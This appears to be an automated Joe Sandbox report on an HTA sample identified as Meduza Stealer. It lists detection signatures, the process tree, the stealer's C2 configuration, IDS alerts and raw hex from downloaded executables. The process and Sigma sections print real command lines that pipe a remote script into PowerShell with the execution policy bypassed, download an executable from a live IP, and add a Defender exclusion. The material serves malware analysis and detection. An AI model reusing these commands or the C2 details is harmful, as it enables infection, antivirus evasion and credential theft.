Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
script.hta

Overview

General Information

Sample name:script.hta
Analysis ID:1578050
MD5:4041595b42e7b6e2ce5965cb76ea7da1
SHA1:401723ee1ac651ad359b89dd7e3cefea91d6aaa9
SHA256:054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
Tags:htauser-lontze7
Infos:

Detection

CredGrabber, Meduza Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CredGrabber
Yara detected Meduza Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mshta.exe (PID: 6344 cmdline: mshta.exe "C:\Users\user\Desktop\script.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 5820 cmdline: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 4144 cmdline: curl -s http://147.45.47.15/script.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • powershell.exe (PID: 3736 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • Launcher.exe (PID: 6676 cmdline: "C:\Windows\Temp\Launcher.exe" MD5: 2696D944FFBEF69510B0C826446FD748)
          • powershell.exe (PID: 1908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7280 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • io12j1es.2tm.exe (PID: 7540 cmdline: "C:\Windows\Temp\io12j1es.2tm.exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)
  • cleanup
{"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\io12j1es.2tm.exeJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: io12j1es.2tm.exe PID: 7540JoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
      Process Memory Space: io12j1es.2tm.exe PID: 7540JoeSecurity_CredGrabberYara detected CredGrabberJoe Security
        SourceRuleDescriptionAuthorStrings
        12.0.io12j1es.2tm.exe.7ff6f1d50000.0.unpackJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
          12.2.io12j1es.2tm.exe.7ff6f1d50000.0.unpackJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 1908, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 1908, ProcessName: powershell.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", ProcessId: 7348, ProcessName: powershell.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\script.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6344, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 5820, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 1908, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5820, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 3736, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", ProcessId: 7348, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 1908, ProcessName: powershell.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 6676, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'", ProcessId: 7348, ProcessName: powershell.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\script.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6344, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 5820, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5820, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 3736, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:11:59.129786+010020494411A Network Trojan was detected192.168.2.449740193.3.19.15115666TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:11:59.129786+010020508061A Network Trojan was detected192.168.2.449740193.3.19.15115666TCP
            2024-12-19T08:11:59.249727+010020508061A Network Trojan was detected192.168.2.449740193.3.19.15115666TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:11:59.129786+010020508071A Network Trojan was detected192.168.2.449740193.3.19.15115666TCP
            2024-12-19T08:11:59.249727+010020508071A Network Trojan was detected192.168.2.449740193.3.19.15115666TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:11:41.306717+010028032742Potentially Bad Traffic192.168.2.449734147.45.47.1580TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://147.45.47.15/duschno.exeAvira URL Cloud: Label: malware
            Source: 12.2.io12j1es.2tm.exe.7ff6f1d50000.0.unpackMalware Configuration Extractor: Meduza Stealer {"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}
            Source: C:\Windows\Temp\io12j1es.2tm.exeReversingLabs: Detection: 83%
            Source: C:\Windows\Temp\iviewers.dllReversingLabs: Detection: 21%
            Source: script.htaVirustotal: Detection: 14%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: C:\Windows\Temp\io12j1es.2tm.exeJoe Sandbox ML: detected
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC7BA0 CryptUnprotectData,LocalFree,12_2_00007FF6F1DC7BA0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC8440 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,12_2_00007FF6F1DC8440
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC83C0 BCryptCloseAlgorithmProvider,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DC83C0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D83A30 BCryptDestroyKey,12_2_00007FF6F1D83A30
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D87C20 CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1D87C20
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC7EC0 CryptProtectData,LocalFree,12_2_00007FF6F1DC7EC0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC8020 BCryptDecrypt,BCryptDecrypt,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DC8020
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: Binary string: OLEView.pdb source: Launcher.exe, Launcher.exe, 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Launcher.exe.5.dr
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0B500 FindClose,FindFirstFileExW,GetLastError,12_2_00007FF6F1E0B500
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0B5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,12_2_00007FF6F1E0B5B0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD73F0 GetLogicalDriveStringsW,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DD73F0
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\migration\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\migration\wtr\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.4:49740 -> 193.3.19.151:15666
            Source: Network trafficSuricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.4:49740 -> 193.3.19.151:15666
            Source: global trafficTCP traffic: 192.168.2.4:49740 -> 193.3.19.151:15666
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:11:40 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 13:27:42 GMTETag: "1800-6298b60de3f6f"Accept-Ranges: bytesContent-Length: 6144Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 93 65 61 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 0c 00 00 00 08 00 00 00 00 00 00 ae 2b 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 40 00 00 28 00 00 00 5c 2b 00 00 4f 00 00 00 00 60 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 0b 00 00 00 20 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 56 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 03 00 00 00 60 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:11:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 13:27:42 GMTETag: "325e0-6298b60deeb4f"Accept-Ranges: bytesContent-Length: 206304Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 48 02 00 f0 00 00 00 00 60 02 00 90 96 00 00 00 00 00 00 00 00 00 00 00 04 03 00 e0 21 00 00 00 00 03 00 18 2a 00 00 f0 9e 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 9f 00 00 18 00 00 00 48 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 6c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 14 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 0e 00 00 00 30 02 00 00 08 